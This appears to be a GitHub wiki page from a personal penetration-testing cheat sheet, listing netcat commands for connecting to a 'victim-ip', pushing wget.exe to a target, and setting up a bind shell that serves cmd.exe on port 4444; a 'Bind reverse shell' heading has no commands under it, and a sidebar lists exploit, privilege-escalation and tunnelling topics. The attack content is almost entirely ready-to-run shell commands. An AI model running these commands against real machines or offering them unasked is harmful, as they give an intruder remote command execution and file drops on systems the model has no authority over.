Skip to content
lethanhtung01011980 edited this page Apr 21, 2020 · 8 revisions

Common commands

  • Listen: nc -nlvp 4444
  • Connect: nc -nv victim-ip 4444
  • Listen to receive files: nc -nlvp 4444 > wget.exe
  • Connect to send file: nc -nv victim-ip 4444 < wget.exe

Bind shell

B connects to control A

  • A: Listen: nc -nlvp 4444 -e cmd.exe
  • B: Connect and control: nc -nv A-ip 4444

Bind reverse shell

B connects to being controlled by A.

Sidebar

0. COMMON exploits

1. Scan Info

1.2 Passive Gathering

1.3 Active Gathering

2. Pre-attack

2.2 File transfer

3. Get Reverse Shell

4. Exploits

4.2 Windows Exploits

4.3 Linux Exploits

4.4 Password crack

4.5 Buffer Overflow

4.6 Web attacks

6. Escalate Privilege

6.1 Escalate in Windows

6.2 Escalate in Linux

7. Access and further attacks

8. Port redirection and Tunnelling

9. Metasploit

10. Kali

11. Thirdparty scripts

Clone this wiki locally